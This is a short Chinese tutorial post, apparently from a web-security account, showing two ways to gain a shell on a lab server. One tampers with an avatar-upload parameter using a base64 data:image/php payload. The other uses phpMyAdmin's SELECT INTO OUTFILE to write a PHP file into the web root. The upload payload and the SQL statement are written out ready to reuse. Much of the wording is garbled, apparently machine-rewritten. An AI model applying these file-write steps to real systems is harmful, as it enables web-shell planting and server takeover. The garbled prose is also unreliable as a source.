文章目录
[+]
---- 网易云热评
一、任意上传文件拿shell
1、注册账号
(图片来自网络侵删)
2、上传头像
3、上传任意文件,抓包剖析
将tx后面的内容修正为tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHANCiBwaHBpbmZvKCk7IA0KPz4%3D
解密收的内容为:data:image/php;base64,<?php phpinfo();?>,也便是上传一个文件内容为<?php phpinfo();?>的php文件
4、虽然提示报错,但是我们访问上传后的地址: http://192.168.171.128/uploadfile/member/3/0x0.php ,文件已生效
二、sql命令拿shell
1、进入phpmyadmin页面
2、输入一下sql语句并实行,天生一aiyou.php文件,内容为<?php phpinfo();?>
select "<?php phpinfo();?>" into outfile "C:/phpStudy/PHPTutorial/WWW/aiyou.php"
3、访问该文件 http://192.168.171.128/aiyou.php
禁止造孽,后果自大
欢迎关注"大众号:web安全工具库
